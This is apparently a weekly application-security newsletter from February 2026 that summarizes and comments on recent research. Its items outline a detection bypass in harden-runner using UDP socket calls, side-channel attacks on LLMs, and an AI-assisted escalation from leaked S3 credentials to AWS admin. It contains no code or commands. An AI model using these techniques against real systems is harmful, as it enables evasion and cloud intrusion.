Appsec Weekly - Feb 18, 2026

🌶️ 🌶️ This Week in AppSec World 🌶️ 🌶️

Devansh has written a terrific blog on bypassing outbound connections detection in harden-runner. At first my thoughts was how come harden-runner miss UDP socket connection and using sendto, sendmsg and sendmmsg but after reading the blog post looks like these are legitimate kernel interfaces. Moreover this bypass works only in audit mode and not in block mode however it successfully evades step-security detection it seems.

Google and Intel ran a joint deep-dive security review of Intel TDX 1.5, stressing that the security of confidential computing hinges on rigorous, collaborative scrutiny of the underlying hardware and firmware rather than marketing promises. The program pulled in external researchers through bug bounty-style incentives, encouraging them to break the TDX trust model and validate both the design and its real-world implementation. What stands out is less any single bug and more the process: a structured, vendor–researcher feedback loop that treats vulnerability discovery as an expected and necessary part of hardening the platform, not an embarrassment to be hidden.

🤖 This Week in AI Security 🤖

Schneier on Security blog features three research papers on side channel attacks against LLMs one from Google Deepmind way back in 2024 and rest of the two published recently. I’m more on skeptical side watching encrypted network traffic to infer the topic that user might be running inference on LLM. I believe anthropic did patch this issue by adding randomized sequence text to the response to evade this detection.

Vulnerability Spoiler Alert appears to scan open-source commits in real time and raise alerts for security fixes before the corresponding CVEs are published. While I really appreciate the effort, publicly publishing these reports makes me uneasy, because it gives attackers a chance to get ahead of well-intentioned organizations that are still patching their code. This idea of ‘spoiler alerts’ for vulnerabilities is not new; back in 2024–25 I was working on Sherlock and found that large language models are already very effective at identifying vulnerabilities and generating PoC exploits.

Sysdig’s writeup shows how an AI-assisted attacker can go from leaked test credentials in a public S3 bucket to full AWS admin in about eight minutes by chaining together very common misconfigurations in Lambda, IAM, and Bedrock usage. What worries me most is not any new “AI superpower” but how trivial this becomes once you have overprivileged roles, public RAG data, weak guardrails around AI services, and no meaningful runtime monitoring in place.

🏆 AppSec Tools of The Week 🏆

IronClaw feels like the first serious attempt to turn the OpenClaw “AI agent with tools” idea into something you would actually trust to sit next to your SSH keys and prod infra. I really like how aggressively it leans into isolation and least privilege: untrusted tools are pushed into WASM sandboxes with capability-based permissions, HTTP is locked behind endpoint allowlists, and secrets never touch tool code at all but are injected at the host boundary with leak detection on both request and response paths.

And that’s a wrap for this week! If you enjoy this curated issue, feel free to forward or share it with your appsec folks, team, hackerclub. For feedback, hugs, bugs or chats drop an email to [email protected]

Keep Reading